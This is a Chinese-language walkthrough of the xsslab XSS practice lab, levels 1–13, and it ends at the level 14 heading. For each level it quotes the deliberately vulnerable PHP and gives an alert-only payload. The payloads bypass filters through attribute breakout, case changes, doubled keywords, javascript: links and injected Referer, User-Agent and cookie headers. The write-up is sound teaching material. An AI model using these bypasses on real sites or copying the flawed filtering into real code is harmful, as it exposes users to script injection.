XSS（七）xsslab

XSS（七）xsslab

level1

无过滤：name=<script>alert(/xss/)</script>

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

level2

闭合："><script>alert(/xss/)</script>

">onmouseover='alert(/xss/)

第一处在PHP代码块的echo中输出，第二处在表单input中输出，第
一处用htmlspeciachars()做了转义，第二处并没有做限制，闭合
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<input name=keyword  value="'.$str.'">

level3

闭合： onmouseover='alert(/xss/)

将两个输出点都做了htmlspecialchars()转义，那既然做了转义那么双引号和尖括号就没有效果了，但是单引号在这个函数中如果没做特殊的改动，默认是可以出效果的，而且源码中的value是用单引号，看来是有意让使用单引号。
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='onmouseover='alert(/xss/)'>  （onmouseover：事件）

level4

" onmouseover="alert(/xss/)

这里的俩个输出点，一个被转义，另外一个将尖括号替换为空
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">

level5

"><a href="javascript:alert:alert(/xss/)">xss</a>

将<script和on进行了替换
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">

level6

大小写绕过:"><sCript>alert(/xss/)</sCript>

level7

将特殊字符替换成空字符，这样可以采用补充撮合的方法达到XSS攻击效果。
" oonnmouseover="alert(/xss/)
"><scscriptript>alert(/xss/)</scscriptript>

level8

将字符转换为小写，然后过滤特殊字符和双引号，加了一个转义函数输出，，代码处的添加友情链接是
突破点，在input框中输入字符提交之后，在友情链接处会载入一个拼接后的a标签，因为javascript被过滤对其进行编码绕过再点击友情链接即可。
javascript:alert(/xss/)

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

level9

这次在上一题的基础上加入了strpos()函数，查找如果url中找到'http'那么会返回找
到位置的位数，自然不会返回0也就不会等于false，那么就可以绕过限制了，但是为什么会
这么做呢？回想了下，应该是让输入框必须要输入合法的URL即带有http的字符串，那么
可以向输入框加进去就可以绕过了。

javascript:alert(’http:/baidu.com')//http://

level10

&t_sort=xss" onmouseover=alert(/xss/) type="text"
这道题有俩个输出的地方，第一个被实体化过滤，第二个是隐藏表单的"t_sort"参数
即'$str33',过滤了尖括号，那么就在input标签中触发xss即可，可以用onmouseover或者
是onclick，需要将隐藏表单显示出来触发：
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">

level11

Referer: " onmouseover=alert(/xss/) type="text
hidden隐藏了表单，str与str00都被做了转义，可以对输出的$str33写xss语句，
burp抓包改referer即可

level12

同上题原理，改user-agent就可以了
User-Agent:" onclick=alert(/xss/) type="text

level13

同上，改cookie中的user即可
 " onfocus=alert(/xss/) type="text

level14